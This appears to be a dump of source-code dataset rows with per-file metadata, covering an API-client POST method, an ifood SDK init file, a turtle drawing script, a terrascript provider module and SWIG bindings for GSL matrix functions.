    callback receives the response.

    :param TemplateTag data: Model instance data
    :param callback function: callable invoked with the response (optional)
    :return: TemplateTag (or the request thread when called asynchronously)
    :raises TypeError: on an unrecognized keyword argument
    """
    # Reject keyword arguments this endpoint does not understand.
    recognized = ('data', 'callback', '_return_http_data_only')
    for key in kwargs:
        if key not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method template_tags_post" % key
            )

    # Content negotiation; the `Accept` header is omitted entirely when the
    # client selects nothing, `Content-Type` is always sent.
    header_params = {}
    accept = self.api_client.select_header_accept(
        ['application/json', 'application/xml', 'text/xml',
         'application/javascript', 'text/javascript'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json', 'application/x-www-form-urlencoded',
         'application/xml', 'text/xml'])

    return self.api_client.call_api(
        '/TemplateTags'.replace('{format}', 'json'), 'POST',
        {},   # path params
        {},   # query params
        header_params,
        body=kwargs.get('data'),
        post_params=[],
        files={},
        response_type='TemplateTag',
        auth_settings=['access_token'],  # OAuth2 access token
        callback=kwargs.get('callback'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        collection_formats={})
| 40.457415
| 165
| 0.561462
| 6,924
| 67,928
| 5.287262
| 0.037262
| 0.065558
| 0.027534
| 0.029501
| 0.965664
| 0.96184
| 0.959464
| 0.949493
| 0.946161
| 0.945888
| 0
| 0.001071
| 0.353919
| 67,928
| 1,678
| 166
| 40.481526
| 0.833094
| 0.321959
| 0
| 0.825864
| 0
| 0
| 0.173238
| 0.060126
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039693
| false
| 0
| 0.008963
| 0
| 0.107554
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
649a584a39dd97cce08207aa09f799451aaae5c6
| 72
|
py
|
Python
|
src/ifood/exception/__init__.py
|
micael95/sdk-ifood-python
|
27462d8127b62a29b5c89624e79accbea9563a80
|
[
"MIT"
] | 2
|
2021-05-06T18:50:43.000Z
|
2021-06-05T21:54:04.000Z
|
src/ifood/exception/__init__.py
|
micael95/sdk-ifood-python
|
27462d8127b62a29b5c89624e79accbea9563a80
|
[
"MIT"
] | null | null | null |
src/ifood/exception/__init__.py
|
micael95/sdk-ifood-python
|
27462d8127b62a29b5c89624e79accbea9563a80
|
[
"MIT"
] | 1
|
2021-05-06T18:50:54.000Z
|
2021-05-06T18:50:54.000Z
|
from .ifood_exception import *
from .validation_ifood_exception import *
| 36
| 41
| 0.847222
| 9
| 72
| 6.444444
| 0.555556
| 0.482759
| 0.689655
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.097222
| 72
| 2
| 41
| 36
| 0.892308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
64ab436012e110ea7d115add07512853261d146c
| 2,252
|
py
|
Python
|
files/turtle/turtle_test.py
|
HenraL/NSI_1ereG6_Programme_Python
|
9f46b848fa2331daca57e5e2e11cba41da45a67f
|
[
"Unlicense"
] | 1
|
2021-06-15T13:44:47.000Z
|
2021-06-15T13:44:47.000Z
|
files/turtle/turtle_test.py
|
HenraL/NSI_1ereG6_Programme_Python
|
9f46b848fa2331daca57e5e2e11cba41da45a67f
|
[
"Unlicense"
] | null | null | null |
files/turtle/turtle_test.py
|
HenraL/NSI_1ereG6_Programme_Python
|
9f46b848fa2331daca57e5e2e11cba41da45a67f
|
[
"Unlicense"
] | null | null | null |
import turtle
from time import sleep

# One 12-colour cycle; the original literal spelled this list out 16 times
# in a row.  NOTE(review): repeat count of 16 read off the original literal
# by counting 'lightgreen' occurrences -- confirm against the source file.
PALETTE = ['red', 'green', 'yellow', 'blue', 'orange', 'black',
           'purple', 'pink', 'orange', 'blue', 'yellow', 'lightgreen']

t = turtle.Turtle()

# First figure: a long multicoloured spiral of 75-step edges, 50-degree turns.
for c in PALETTE * 16:
    t.color(c)
    t.forward(75)
    t.left(50)

# Reposition without drawing before the second figure.
t.penup()
t.forward(85)
t.pendown()

# Second figure: eight 85-step edges with 60-degree turns.
for d in ['red', 'green', 'yellow', 'blue', 'orange', 'black', 'purple', 'pink']:
    t.color(d)
    t.forward(85)
    t.right(60)

t.penup()
# BUG FIX: the original called t.downwards(85), which is not a method of
# turtle.Turtle and raised AttributeError before the third figure was drawn.
# backward(85) moves the pen-up turtle 85 steps in reverse, matching the
# apparent intent of repositioning between figures.
t.backward(85)
t.pendown()

# Third figure: eight 85-step edges with 90-degree turns.
for d in ['red', 'green', 'yellow', 'blue', 'orange', 'black', 'purple', 'pink']:
    t.color(d)
    t.forward(85)
    t.right(90)

# Keep the window visible briefly before the script exits.
sleep(5)
| 93.833333
| 1,817
| 0.581705
| 269
| 2,252
| 4.869888
| 0.118959
| 0.109924
| 0.192366
| 0.247328
| 0.914504
| 0.914504
| 0.914504
| 0.914504
| 0.914504
| 0.912977
| 0
| 0.008538
| 0.115897
| 2,252
| 24
| 1,818
| 93.833333
| 0.649422
| 0
| 0
| 0.5
| 0
| 0
| 0.496227
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.090909
| 0
| 0.090909
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
b37eff738a5e15e2da690cb01607ff9536132758
| 388
|
py
|
Python
|
terrascript/provider/opsgenie.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 507
|
2017-07-26T02:58:38.000Z
|
2022-01-21T12:35:13.000Z
|
terrascript/provider/opsgenie.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 135
|
2017-07-20T12:01:59.000Z
|
2021-10-04T22:25:40.000Z
|
terrascript/provider/opsgenie.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 81
|
2018-02-20T17:55:28.000Z
|
2022-01-31T07:08:40.000Z
|
# terrascript/provider/opsgenie.py
# Automatically generated by tools/makecode.py (24-Aug-2021 11:33:38 UTC)
#
# For imports without namespace, e.g.
#
# >>> import terrascript.provider.opsgenie
#
# instead of
#
# >>> import terrascript.provider.opsgenie.opsgenie
#
# This is only available for 'official' and 'partner' providers.
from terrascript.provider.opsgenie.opsgenie import *
| 25.866667
| 73
| 0.75
| 49
| 388
| 5.938776
| 0.693878
| 0.261168
| 0.371134
| 0.226804
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.035608
| 0.131443
| 388
| 14
| 74
| 27.714286
| 0.827893
| 0.796392
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b3826ca2af3ffc6c2528e11442089749f9026e1e
| 35,080
|
py
|
Python
|
btk20_src/matrix/matrix.py
|
mmahrous90/distant_speech_recognition
|
083e663d7c1eb6e5fe89c40ba2b43a30bf9c65b5
|
[
"MIT"
] | null | null | null |
btk20_src/matrix/matrix.py
|
mmahrous90/distant_speech_recognition
|
083e663d7c1eb6e5fe89c40ba2b43a30bf9c65b5
|
[
"MIT"
] | null | null | null |
btk20_src/matrix/matrix.py
|
mmahrous90/distant_speech_recognition
|
083e663d7c1eb6e5fe89c40ba2b43a30bf9c65b5
|
[
"MIT"
] | null | null | null |
# This file was automatically generated by SWIG (http://www.swig.org).
# Version 3.0.12
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info as _swig_python_version_info
# SWIG bootstrap: locate and load the compiled `_matrix` extension module,
# choosing the import mechanism appropriate to the running Python version.
if _swig_python_version_info >= (2, 7, 0):
    # Python >= 2.7: resolve the extension relative to this package first,
    # falling back to a top-level `_matrix` module.
    def swig_import_helper():
        import importlib
        pkg = __name__.rpartition('.')[0]
        mname = '.'.join((pkg, '_matrix')).lstrip('.')
        try:
            return importlib.import_module(mname)
        except ImportError:
            return importlib.import_module('_matrix')
    _matrix = swig_import_helper()
    del swig_import_helper
elif _swig_python_version_info >= (2, 6, 0):
    # Python 2.6: use the older `imp` machinery to find the shared object
    # next to this file.
    def swig_import_helper():
        from os.path import dirname
        import imp
        fp = None
        try:
            fp, pathname, description = imp.find_module('_matrix', [dirname(__file__)])
        except ImportError:
            import _matrix
            return _matrix
        try:
            _mod = imp.load_module('_matrix', fp, pathname, description)
        finally:
            # find_module may return an open file handle; always close it.
            if fp is not None:
                fp.close()
        return _mod
    _matrix = swig_import_helper()
    del swig_import_helper
else:
    # Very old Pythons: plain import.
    import _matrix
del _swig_python_version_info
try:
    _swig_property = property
except NameError:
    pass  # Python < 2.2 doesn't have 'property'.
# Alias the builtins module under its Python 2 name for the code below.
try:
    import builtins as __builtin__
except ImportError:
    import __builtin__
def _swig_setattr_nondynamic(self, class_type, name, value, static=1):
    # SWIG-generated attribute setter: routes writes through the class's
    # __swig_setmethods__ table so C-level struct fields are updated.
    if (name == "thisown"):
        # "thisown" controls whether Python owns (and frees) the C object.
        return self.this.own(value)
    if (name == "this"):
        # Attach the low-level SWIG pointer object directly.
        if type(value).__name__ == 'SwigPyObject':
            self.__dict__[name] = value
            return
    method = class_type.__swig_setmethods__.get(name, None)
    if method:
        return method(self, value)
    if (not static):
        # Dynamic mode: fall back to a plain Python attribute.
        if _newclass:
            object.__setattr__(self, name, value)
        else:
            self.__dict__[name] = value
    else:
        # Static mode: unknown attribute names are an error.
        raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self, class_type, name, value):
    # Non-static variant: unknown names become ordinary Python attributes.
    return _swig_setattr_nondynamic(self, class_type, name, value, 0)
def _swig_getattr(self, class_type, name):
    # SWIG-generated attribute getter: consults the class's
    # __swig_getmethods__ table before raising AttributeError.
    if (name == "thisown"):
        return self.this.own()
    method = class_type.__swig_getmethods__.get(name, None)
    if method:
        return method(self)
    raise AttributeError("'%s' object has no attribute '%s'" % (class_type.__name__, name))
def _swig_repr(self):
    # Shared repr for all proxy classes; falls back to an empty pointer
    # description when the underlying C object ("this") is absent.
    try:
        strthis = "proxy of " + self.this.__repr__()
    except __builtin__.Exception:
        strthis = ""
    return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
# New-style-class compatibility shim: on any remotely modern Python,
# _object is `object` and _newclass is truthy.
try:
    _object = object
    _newclass = 1
except __builtin__.Exception:
    # Ancient Pythons without new-style classes.
    class _object:
        pass
    _newclass = 0
class gsl_matrix(_object):
    """SWIG proxy for the C ``gsl_matrix`` struct exposed by ``_matrix``."""
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, gsl_matrix, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, gsl_matrix, name)
    __repr__ = _swig_repr
    # Each struct field registers a C-level getter/setter pair in the
    # dispatch tables used by _swig_setattr/_swig_getattr above; on
    # new-style-class Pythons a property is installed as well.
    __swig_setmethods__["size1"] = _matrix.gsl_matrix_size1_set
    __swig_getmethods__["size1"] = _matrix.gsl_matrix_size1_get
    if _newclass:
        size1 = _swig_property(_matrix.gsl_matrix_size1_get, _matrix.gsl_matrix_size1_set)
    __swig_setmethods__["size2"] = _matrix.gsl_matrix_size2_set
    __swig_getmethods__["size2"] = _matrix.gsl_matrix_size2_get
    if _newclass:
        size2 = _swig_property(_matrix.gsl_matrix_size2_get, _matrix.gsl_matrix_size2_set)
    __swig_setmethods__["tda"] = _matrix.gsl_matrix_tda_set
    __swig_getmethods__["tda"] = _matrix.gsl_matrix_tda_get
    if _newclass:
        tda = _swig_property(_matrix.gsl_matrix_tda_get, _matrix.gsl_matrix_tda_set)
    __swig_setmethods__["data"] = _matrix.gsl_matrix_data_set
    __swig_getmethods__["data"] = _matrix.gsl_matrix_data_get
    if _newclass:
        data = _swig_property(_matrix.gsl_matrix_data_get, _matrix.gsl_matrix_data_set)
    __swig_setmethods__["block"] = _matrix.gsl_matrix_block_set
    __swig_getmethods__["block"] = _matrix.gsl_matrix_block_get
    if _newclass:
        block = _swig_property(_matrix.gsl_matrix_block_get, _matrix.gsl_matrix_block_set)
    __swig_setmethods__["owner"] = _matrix.gsl_matrix_owner_set
    __swig_getmethods__["owner"] = _matrix.gsl_matrix_owner_get
    if _newclass:
        owner = _swig_property(_matrix.gsl_matrix_owner_get, _matrix.gsl_matrix_owner_set)

    def __init__(self, m, n):
        # Allocate a new C matrix and attach it to this proxy.
        this = _matrix.new_gsl_matrix(m, n)
        try:
            self.this.append(this)
        except __builtin__.Exception:
            self.this = this
    # Destruction is delegated to the C side; __del__ is a no-op so SWIG's
    # __swig_destroy__ machinery controls the object's lifetime.
    __swig_destroy__ = _matrix.delete_gsl_matrix
    __del__ = lambda self: None

    def nrows(self):
        return _matrix.gsl_matrix_nrows(self)

    def ncols(self):
        return _matrix.gsl_matrix_ncols(self)

    def __getitem__(self, m, n):
        # NOTE(review): SWIG emitted this with two separate index
        # parameters, so it is not callable through mat[i, j] subscript
        # syntax directly -- confirm intended calling convention.
        return _matrix.gsl_matrix___getitem__(self, m, n)

    def __setitem__(self, item, n, m):
        # NOTE(review): same multi-parameter caveat as __getitem__.
        return _matrix.gsl_matrix___setitem__(self, item, n, m)

# Register the proxy class with the C extension.
gsl_matrix_swigregister = _matrix.gsl_matrix_swigregister
gsl_matrix_swigregister(gsl_matrix)
class _gsl_matrix_view(_object):
    """SWIG proxy for the C ``_gsl_matrix_view`` struct (a non-owning view)."""
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, _gsl_matrix_view, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, _gsl_matrix_view, name)
    __repr__ = _swig_repr
    # The single struct field: the embedded gsl_matrix header.
    __swig_setmethods__["matrix"] = _matrix._gsl_matrix_view_matrix_set
    __swig_getmethods__["matrix"] = _matrix._gsl_matrix_view_matrix_get
    if _newclass:
        matrix = _swig_property(_matrix._gsl_matrix_view_matrix_get, _matrix._gsl_matrix_view_matrix_set)

    def __init__(self):
        this = _matrix.new__gsl_matrix_view()
        try:
            self.this.append(this)
        except __builtin__.Exception:
            self.this = this
    __swig_destroy__ = _matrix.delete__gsl_matrix_view
    __del__ = lambda self: None

# Register the proxy class with the C extension.
_gsl_matrix_view_swigregister = _matrix._gsl_matrix_view_swigregister
_gsl_matrix_view_swigregister(_gsl_matrix_view)
class _gsl_matrix_const_view(_object):
    """SWIG proxy for the C ``_gsl_matrix_const_view`` struct (read-only view)."""
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, _gsl_matrix_const_view, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, _gsl_matrix_const_view, name)
    __repr__ = _swig_repr
    # The single struct field: the embedded gsl_matrix header.
    __swig_setmethods__["matrix"] = _matrix._gsl_matrix_const_view_matrix_set
    __swig_getmethods__["matrix"] = _matrix._gsl_matrix_const_view_matrix_get
    if _newclass:
        matrix = _swig_property(_matrix._gsl_matrix_const_view_matrix_get, _matrix._gsl_matrix_const_view_matrix_set)

    def __init__(self):
        this = _matrix.new__gsl_matrix_const_view()
        try:
            self.this.append(this)
        except __builtin__.Exception:
            self.this = this
    __swig_destroy__ = _matrix.delete__gsl_matrix_const_view
    __del__ = lambda self: None

# Register the proxy class with the C extension.
_gsl_matrix_const_view_swigregister = _matrix._gsl_matrix_const_view_swigregister
_gsl_matrix_const_view_swigregister(_gsl_matrix_const_view)
# ---------------------------------------------------------------------------
# Flat wrappers for the double-precision gsl_matrix C API.  Each Python stub
# below is immediately rebound to the underlying C entry point in _matrix,
# so the def serves only as generated scaffolding; all behavior lives in C.
# ---------------------------------------------------------------------------
# -- allocation / deallocation --
def gsl_matrix_alloc(n1, n2):
    return _matrix.gsl_matrix_alloc(n1, n2)
gsl_matrix_alloc = _matrix.gsl_matrix_alloc
def gsl_matrix_calloc(n1, n2):
    return _matrix.gsl_matrix_calloc(n1, n2)
gsl_matrix_calloc = _matrix.gsl_matrix_calloc
def gsl_matrix_alloc_from_block(b, offset, n1, n2, d2):
    return _matrix.gsl_matrix_alloc_from_block(b, offset, n1, n2, d2)
gsl_matrix_alloc_from_block = _matrix.gsl_matrix_alloc_from_block
def gsl_matrix_alloc_from_matrix(m, k1, k2, n1, n2):
    return _matrix.gsl_matrix_alloc_from_matrix(m, k1, k2, n1, n2)
gsl_matrix_alloc_from_matrix = _matrix.gsl_matrix_alloc_from_matrix
def gsl_vector_alloc_row_from_matrix(m, i):
    return _matrix.gsl_vector_alloc_row_from_matrix(m, i)
gsl_vector_alloc_row_from_matrix = _matrix.gsl_vector_alloc_row_from_matrix
def gsl_vector_alloc_col_from_matrix(m, j):
    return _matrix.gsl_vector_alloc_col_from_matrix(m, j)
gsl_vector_alloc_col_from_matrix = _matrix.gsl_vector_alloc_col_from_matrix
def gsl_matrix_free(m):
    return _matrix.gsl_matrix_free(m)
gsl_matrix_free = _matrix.gsl_matrix_free
# -- views (mutable and const) over matrices, vectors and raw arrays --
def gsl_matrix_submatrix(m, i, j, n1, n2):
    return _matrix.gsl_matrix_submatrix(m, i, j, n1, n2)
gsl_matrix_submatrix = _matrix.gsl_matrix_submatrix
def gsl_matrix_row(m, i):
    return _matrix.gsl_matrix_row(m, i)
gsl_matrix_row = _matrix.gsl_matrix_row
def gsl_matrix_column(m, j):
    return _matrix.gsl_matrix_column(m, j)
gsl_matrix_column = _matrix.gsl_matrix_column
def gsl_matrix_diagonal(m):
    return _matrix.gsl_matrix_diagonal(m)
gsl_matrix_diagonal = _matrix.gsl_matrix_diagonal
def gsl_matrix_subdiagonal(m, k):
    return _matrix.gsl_matrix_subdiagonal(m, k)
gsl_matrix_subdiagonal = _matrix.gsl_matrix_subdiagonal
def gsl_matrix_superdiagonal(m, k):
    return _matrix.gsl_matrix_superdiagonal(m, k)
gsl_matrix_superdiagonal = _matrix.gsl_matrix_superdiagonal
def gsl_matrix_subrow(m, i, offset, n):
    return _matrix.gsl_matrix_subrow(m, i, offset, n)
gsl_matrix_subrow = _matrix.gsl_matrix_subrow
def gsl_matrix_subcolumn(m, j, offset, n):
    return _matrix.gsl_matrix_subcolumn(m, j, offset, n)
gsl_matrix_subcolumn = _matrix.gsl_matrix_subcolumn
def gsl_matrix_view_array(base, n1, n2):
    return _matrix.gsl_matrix_view_array(base, n1, n2)
gsl_matrix_view_array = _matrix.gsl_matrix_view_array
def gsl_matrix_view_array_with_tda(base, n1, n2, tda):
    return _matrix.gsl_matrix_view_array_with_tda(base, n1, n2, tda)
gsl_matrix_view_array_with_tda = _matrix.gsl_matrix_view_array_with_tda
def gsl_matrix_view_vector(v, n1, n2):
    return _matrix.gsl_matrix_view_vector(v, n1, n2)
gsl_matrix_view_vector = _matrix.gsl_matrix_view_vector
def gsl_matrix_view_vector_with_tda(v, n1, n2, tda):
    return _matrix.gsl_matrix_view_vector_with_tda(v, n1, n2, tda)
gsl_matrix_view_vector_with_tda = _matrix.gsl_matrix_view_vector_with_tda
def gsl_matrix_const_submatrix(m, i, j, n1, n2):
    return _matrix.gsl_matrix_const_submatrix(m, i, j, n1, n2)
gsl_matrix_const_submatrix = _matrix.gsl_matrix_const_submatrix
def gsl_matrix_const_row(m, i):
    return _matrix.gsl_matrix_const_row(m, i)
gsl_matrix_const_row = _matrix.gsl_matrix_const_row
def gsl_matrix_const_column(m, j):
    return _matrix.gsl_matrix_const_column(m, j)
gsl_matrix_const_column = _matrix.gsl_matrix_const_column
def gsl_matrix_const_diagonal(m):
    return _matrix.gsl_matrix_const_diagonal(m)
gsl_matrix_const_diagonal = _matrix.gsl_matrix_const_diagonal
def gsl_matrix_const_subdiagonal(m, k):
    return _matrix.gsl_matrix_const_subdiagonal(m, k)
gsl_matrix_const_subdiagonal = _matrix.gsl_matrix_const_subdiagonal
def gsl_matrix_const_superdiagonal(m, k):
    return _matrix.gsl_matrix_const_superdiagonal(m, k)
gsl_matrix_const_superdiagonal = _matrix.gsl_matrix_const_superdiagonal
def gsl_matrix_const_subrow(m, i, offset, n):
    return _matrix.gsl_matrix_const_subrow(m, i, offset, n)
gsl_matrix_const_subrow = _matrix.gsl_matrix_const_subrow
def gsl_matrix_const_subcolumn(m, j, offset, n):
    return _matrix.gsl_matrix_const_subcolumn(m, j, offset, n)
gsl_matrix_const_subcolumn = _matrix.gsl_matrix_const_subcolumn
def gsl_matrix_const_view_array(base, n1, n2):
    return _matrix.gsl_matrix_const_view_array(base, n1, n2)
gsl_matrix_const_view_array = _matrix.gsl_matrix_const_view_array
def gsl_matrix_const_view_array_with_tda(base, n1, n2, tda):
    return _matrix.gsl_matrix_const_view_array_with_tda(base, n1, n2, tda)
gsl_matrix_const_view_array_with_tda = _matrix.gsl_matrix_const_view_array_with_tda
def gsl_matrix_const_view_vector(v, n1, n2):
    return _matrix.gsl_matrix_const_view_vector(v, n1, n2)
gsl_matrix_const_view_vector = _matrix.gsl_matrix_const_view_vector
def gsl_matrix_const_view_vector_with_tda(v, n1, n2, tda):
    return _matrix.gsl_matrix_const_view_vector_with_tda(v, n1, n2, tda)
gsl_matrix_const_view_vector_with_tda = _matrix.gsl_matrix_const_view_vector_with_tda
# -- whole-matrix initialization --
def gsl_matrix_set_zero(m):
    return _matrix.gsl_matrix_set_zero(m)
gsl_matrix_set_zero = _matrix.gsl_matrix_set_zero
def gsl_matrix_set_identity(m):
    return _matrix.gsl_matrix_set_identity(m)
gsl_matrix_set_identity = _matrix.gsl_matrix_set_identity
def gsl_matrix_set_all(m, x):
    return _matrix.gsl_matrix_set_all(m, x)
gsl_matrix_set_all = _matrix.gsl_matrix_set_all
# -- binary / formatted I/O --
def gsl_matrix_fread(stream, m):
    return _matrix.gsl_matrix_fread(stream, m)
gsl_matrix_fread = _matrix.gsl_matrix_fread
def gsl_matrix_fwrite(stream, m):
    return _matrix.gsl_matrix_fwrite(stream, m)
gsl_matrix_fwrite = _matrix.gsl_matrix_fwrite
def gsl_matrix_fscanf(stream, m):
    return _matrix.gsl_matrix_fscanf(stream, m)
gsl_matrix_fscanf = _matrix.gsl_matrix_fscanf
def gsl_matrix_fprintf(stream, m, format):
    return _matrix.gsl_matrix_fprintf(stream, m, format)
gsl_matrix_fprintf = _matrix.gsl_matrix_fprintf
# -- copying, swapping and transposition --
def gsl_matrix_memcpy(dest, src):
    return _matrix.gsl_matrix_memcpy(dest, src)
gsl_matrix_memcpy = _matrix.gsl_matrix_memcpy
def gsl_matrix_swap(m1, m2):
    return _matrix.gsl_matrix_swap(m1, m2)
gsl_matrix_swap = _matrix.gsl_matrix_swap
def gsl_matrix_tricpy(uplo_src, copy_diag, dest, src):
    return _matrix.gsl_matrix_tricpy(uplo_src, copy_diag, dest, src)
gsl_matrix_tricpy = _matrix.gsl_matrix_tricpy
def gsl_matrix_swap_rows(m, i, j):
    return _matrix.gsl_matrix_swap_rows(m, i, j)
gsl_matrix_swap_rows = _matrix.gsl_matrix_swap_rows
def gsl_matrix_swap_columns(m, i, j):
    return _matrix.gsl_matrix_swap_columns(m, i, j)
gsl_matrix_swap_columns = _matrix.gsl_matrix_swap_columns
def gsl_matrix_swap_rowcol(m, i, j):
    return _matrix.gsl_matrix_swap_rowcol(m, i, j)
gsl_matrix_swap_rowcol = _matrix.gsl_matrix_swap_rowcol
def gsl_matrix_transpose(m):
    return _matrix.gsl_matrix_transpose(m)
gsl_matrix_transpose = _matrix.gsl_matrix_transpose
def gsl_matrix_transpose_memcpy(dest, src):
    return _matrix.gsl_matrix_transpose_memcpy(dest, src)
gsl_matrix_transpose_memcpy = _matrix.gsl_matrix_transpose_memcpy
def gsl_matrix_transpose_tricpy(uplo_src, copy_diag, dest, src):
    return _matrix.gsl_matrix_transpose_tricpy(uplo_src, copy_diag, dest, src)
gsl_matrix_transpose_tricpy = _matrix.gsl_matrix_transpose_tricpy
# -- reductions (extrema and their indices) --
def gsl_matrix_max(m):
    return _matrix.gsl_matrix_max(m)
gsl_matrix_max = _matrix.gsl_matrix_max
def gsl_matrix_min(m):
    return _matrix.gsl_matrix_min(m)
gsl_matrix_min = _matrix.gsl_matrix_min
def gsl_matrix_minmax(m, min_out, max_out):
    return _matrix.gsl_matrix_minmax(m, min_out, max_out)
gsl_matrix_minmax = _matrix.gsl_matrix_minmax
def gsl_matrix_max_index(m, imax, jmax):
    return _matrix.gsl_matrix_max_index(m, imax, jmax)
gsl_matrix_max_index = _matrix.gsl_matrix_max_index
def gsl_matrix_min_index(m, imin, jmin):
    return _matrix.gsl_matrix_min_index(m, imin, jmin)
gsl_matrix_min_index = _matrix.gsl_matrix_min_index
def gsl_matrix_minmax_index(m, imin, jmin, imax, jmax):
    return _matrix.gsl_matrix_minmax_index(m, imin, jmin, imax, jmax)
gsl_matrix_minmax_index = _matrix.gsl_matrix_minmax_index
# -- predicates --
def gsl_matrix_equal(a, b):
    return _matrix.gsl_matrix_equal(a, b)
gsl_matrix_equal = _matrix.gsl_matrix_equal
def gsl_matrix_isnull(m):
    return _matrix.gsl_matrix_isnull(m)
gsl_matrix_isnull = _matrix.gsl_matrix_isnull
def gsl_matrix_ispos(m):
    return _matrix.gsl_matrix_ispos(m)
gsl_matrix_ispos = _matrix.gsl_matrix_ispos
def gsl_matrix_isneg(m):
    return _matrix.gsl_matrix_isneg(m)
gsl_matrix_isneg = _matrix.gsl_matrix_isneg
def gsl_matrix_isnonneg(m):
    return _matrix.gsl_matrix_isnonneg(m)
gsl_matrix_isnonneg = _matrix.gsl_matrix_isnonneg
# -- element-wise arithmetic (in place on the first operand) --
def gsl_matrix_add(a, b):
    return _matrix.gsl_matrix_add(a, b)
gsl_matrix_add = _matrix.gsl_matrix_add
def gsl_matrix_sub(a, b):
    return _matrix.gsl_matrix_sub(a, b)
gsl_matrix_sub = _matrix.gsl_matrix_sub
def gsl_matrix_mul_elements(a, b):
    return _matrix.gsl_matrix_mul_elements(a, b)
gsl_matrix_mul_elements = _matrix.gsl_matrix_mul_elements
def gsl_matrix_div_elements(a, b):
    return _matrix.gsl_matrix_div_elements(a, b)
gsl_matrix_div_elements = _matrix.gsl_matrix_div_elements
def gsl_matrix_scale(a, x):
    return _matrix.gsl_matrix_scale(a, x)
gsl_matrix_scale = _matrix.gsl_matrix_scale
def gsl_matrix_add_constant(a, x):
    return _matrix.gsl_matrix_add_constant(a, x)
gsl_matrix_add_constant = _matrix.gsl_matrix_add_constant
def gsl_matrix_add_diagonal(a, x):
    return _matrix.gsl_matrix_add_diagonal(a, x)
gsl_matrix_add_diagonal = _matrix.gsl_matrix_add_diagonal
# -- row/column and single-element access --
def gsl_matrix_get_row(v, m, i):
    return _matrix.gsl_matrix_get_row(v, m, i)
gsl_matrix_get_row = _matrix.gsl_matrix_get_row
def gsl_matrix_get_col(v, m, j):
    return _matrix.gsl_matrix_get_col(v, m, j)
gsl_matrix_get_col = _matrix.gsl_matrix_get_col
def gsl_matrix_set_row(m, i, v):
    return _matrix.gsl_matrix_set_row(m, i, v)
gsl_matrix_set_row = _matrix.gsl_matrix_set_row
def gsl_matrix_set_col(m, j, v):
    return _matrix.gsl_matrix_set_col(m, j, v)
gsl_matrix_set_col = _matrix.gsl_matrix_set_col
def gsl_matrix_get(m, i, j):
    return _matrix.gsl_matrix_get(m, i, j)
gsl_matrix_get = _matrix.gsl_matrix_get
def gsl_matrix_set(m, i, j, x):
    return _matrix.gsl_matrix_set(m, i, j, x)
gsl_matrix_set = _matrix.gsl_matrix_set
def gsl_matrix_ptr(m, i, j):
    return _matrix.gsl_matrix_ptr(m, i, j)
gsl_matrix_ptr = _matrix.gsl_matrix_ptr
def gsl_matrix_const_ptr(m, i, j):
    return _matrix.gsl_matrix_const_ptr(m, i, j)
gsl_matrix_const_ptr = _matrix.gsl_matrix_const_ptr
class gsl_matrix_float(_object):
    """SWIG proxy for the C struct gsl_matrix_float (auto-generated).

    Mirrors the C layout: size1 x size2 elements, row stride tda, a data
    pointer, the owning block, and an ownership flag.
    """
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, gsl_matrix_float, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, gsl_matrix_float, name)
    __repr__ = _swig_repr
    # Struct members exposed through the generated C getters/setters.
    __swig_setmethods__["size1"] = _matrix.gsl_matrix_float_size1_set
